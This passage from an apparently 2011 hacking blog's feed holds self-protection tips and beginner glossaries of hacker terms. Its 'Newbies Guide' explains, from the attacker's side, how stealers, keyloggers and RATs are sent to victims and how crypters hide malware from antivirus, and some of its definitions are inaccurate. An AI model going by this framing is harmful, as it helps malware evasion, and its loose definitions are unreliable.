&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK_YkzldWyiTgXCDyFOosoSWnayXxfUxG42e3HuOG3Qxzrf06fndZteMJxuFDGUTbFcA2kSvSaQiZGsDGTjTZJkcJ6oznyjgqX7IU4Ht9XCRYnBQ73R2u01JzEYd8aYjmDjWarYKWmHo77/s1600/FrontPageAnimation.gif&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;404&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK_YkzldWyiTgXCDyFOosoSWnayXxfUxG42e3HuOG3Qxzrf06fndZteMJxuFDGUTbFcA2kSvSaQiZGsDGTjTZJkcJ6oznyjgqX7IU4Ht9XCRYnBQ73R2u01JzEYd8aYjmDjWarYKWmHo77/s640/FrontPageAnimation.gif&quot; style=&quot;cursor: move;&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;8) Use VmWare to run unkown softwares. It is similar to sandboxie.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;9) Never save any password on IM clients like MSN, Yahoo, Skype etc.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;10) Never save passwords on ftp clients like filezilla, smart ftp etc.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;11) Never download any softwares which says poker chips creator, free paypal money adder etc. Never believe in such softwares which dont exist. Its all fake softwares which are binded probably with a bot.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;12) Never visit links which you are not sure.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;13) Never accept pictures sent through IM clients where the sender in unkown.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;14) Finally make sure all your windows, anti-virus, anti-malware definitions are upto date.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;Credit:&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://adf.ly/1Wv4w&quot;&gt;ProVirus from Crackhackforum&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/2870284731205015791/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/here-is-in-detail-thread-about-self.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/2870284731205015791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/2870284731205015791'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/here-is-in-detail-thread-about-self.html' title='Ultimate Guide To Protect Youself'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK_YkzldWyiTgXCDyFOosoSWnayXxfUxG42e3HuOG3Qxzrf06fndZteMJxuFDGUTbFcA2kSvSaQiZGsDGTjTZJkcJ6oznyjgqX7IU4Ht9XCRYnBQ73R2u01JzEYd8aYjmDjWarYKWmHo77/s72-c/FrontPageAnimation.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-4036130197487368276</id><published>2011-05-25T00:04:00.000+05:30</published><updated>2011-05-25T00:04:16.515+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>Hackers Terminology</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;White Hat - These are people who write Anti Virus programs, and spend their time fighting malware. They do not get involved in the use of viruses/trojans, but instead spend their time disinfecting computers.&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Black Hat - These are people with casual disregard for morals. They infect other computers, and some commit serious fraud and other crimes. These people give &quot;Hacking&quot; a bad name.&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Grey Hat - These people are in between white and black hat.&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Skid - This is someone who is not very good at hacking, and does not really know what they are talking about. They C&amp;amp;P programs, instead of learning how to code one themselves. If you are called this, don&#39;t bother flaming back as this will just encourage the person. Some people also use the term noob.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/4036130197487368276/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/hackers-terminology.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/4036130197487368276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/4036130197487368276'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/hackers-terminology.html' title='Hackers Terminology'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-6858483887624868497</id><published>2011-05-25T00:02:00.001+05:30</published><updated>2011-05-25T00:03:28.143+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous"/><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Botnet"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><title type='text'>A Newbies Guide</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is hacking?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;A:&lt;/b&gt;&amp;nbsp;The terms &quot;hack&quot; are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as DIY circuit bending. It is from this usage that the term &quot;hacking&quot; is often incorrectly used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is cracking?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;A:&lt;/b&gt;&amp;nbsp;Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file&#39;s access is restricted.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is a virus/trojan/malicious script?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&lt;/span&gt;&lt;/b&gt;&amp;nbsp;A computer virus is a computer program that can copy itself and infect a computer. The term &quot;virus&quot; is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer..&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is a stealer?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&lt;/span&gt;&lt;/b&gt;&amp;nbsp;A stealer is a software designed to create viruses. This virus is called as a server. You send the server to the victim and if they open it all their passes (according to how the stealer is built) will be sent to you via email, or ftp or a php webhost.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is a RAT?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&lt;/span&gt;&lt;/b&gt;&amp;nbsp;A Rat is a software created that created similar servers (virus). If the victim opens it they will be your RAT. You can have a complete access to their system. There are hundereds of features.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;RAT - Remote Administration Tool.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is a keylogger?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&lt;/span&gt;&amp;nbsp;&lt;/b&gt;A keylogger is a software designed to create servers. You send the server to the victim and if they open it all their keystrokes would be sent you via email, ftp, php webhost etc.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is BOT?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&lt;/span&gt;&lt;/b&gt;&amp;nbsp;A bot is a malicious program which has several purposes.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;They are usually told what to do by a botnet admin although many of the features now are automated.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is a BOTNET?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&lt;/span&gt;&lt;/b&gt;&amp;nbsp;A botnet is a network of infected computers that all connect to one area where they are commanded by the botnet admin.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is a crypter?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;A:&lt;/b&gt;&amp;nbsp;All your servers that you create of a keylogger, stealer, RATs etc. are detected by antivirus. So inorder to make it FUD (Fully UnDetectable) we use a crypter and crypt your infected server.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: How does a crypter work?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;A:&lt;/b&gt;&amp;nbsp;A crypter has a built in or external file called stub. This stub is based on common encryptions like rc4, xor, tweafish, blowfish etc. When you crypt your infected file the crypter embeds the stub onto your server and covers the server. Just like how you paint your rusted metals. And makes it undetectable from anti-virus.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is reverting?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;Reverting is a technique used to obtain forgotten passwords. But a hacker uses this method to access the victims account.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is social engineering?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&lt;/span&gt;&lt;/b&gt;&amp;nbsp;It is a psychological approach, where you manipulate people into performing actions or divulging confidential information, rather than by breaking in or using technical hacking techniques (essentially a fancier, more technical way of lying).&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: What is DDos?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;A:&lt;/b&gt;&amp;nbsp;DOS - Denial Of Service.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;This is using bots. If you have a large number of bots you make them send packets to the target site and make them break down.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: How is website and forum hack possible?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;A:&amp;nbsp;&lt;/b&gt;There are lots of methods. The most basic one is you find exploits on a webserver and use them to gain access and deface it.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;Sql, XSS, LFI, RFI, DNS poisoning etc.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Q: Can everyone be h4k5er?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;A:&lt;/span&gt;&lt;/b&gt;&amp;nbsp;No, u need a brain and common sense.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Credit:&amp;nbsp;&lt;a href=&quot;http://adf.ly/1Wv4w%20&quot;&gt;ProVirus from crackhackforum&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/6858483887624868497/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/newbies-guide.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/6858483887624868497'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/6858483887624868497'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/newbies-guide.html' title='A Newbies Guide'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-7822963782123160593</id><published>2011-05-25T00:00:00.001+05:30</published><updated>2011-05-25T00:02:41.959+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Penetration Testing"/><title type='text'>Penetration Testing Bookmarks</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;The Open Penetration Testing Bookmarks Collection&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;...is just that, a collection of handy bookmarks I initially collected that aid me in my day to day work or I find in the course of research. They are not all inclusive and some sections need to be parsed but they are all good reference materials. I find having this Hackery folder in Firefox an easy way to reference syntax, tricks, methods, and generally facilitate and organize research.&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Opening it up to everyone will facilitate a knowledge transfer. Hopefully the initial set will grow and expand.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;a href=&quot;http://adf.ly/1NPzb&quot;&gt;Download the Bookmark from here&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;Who?:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Started by Jason Haddix of HP&#39;s Application Security Center. Edited and managed by Nathan Drier of Trustwave SpiderLabs division and James Fitts of Strategic Security.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Work and contributions also by:&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;David Shaw of Redspin Penetration Testing @ownpile&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Rob Fuller of Rapid7 @mubix&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
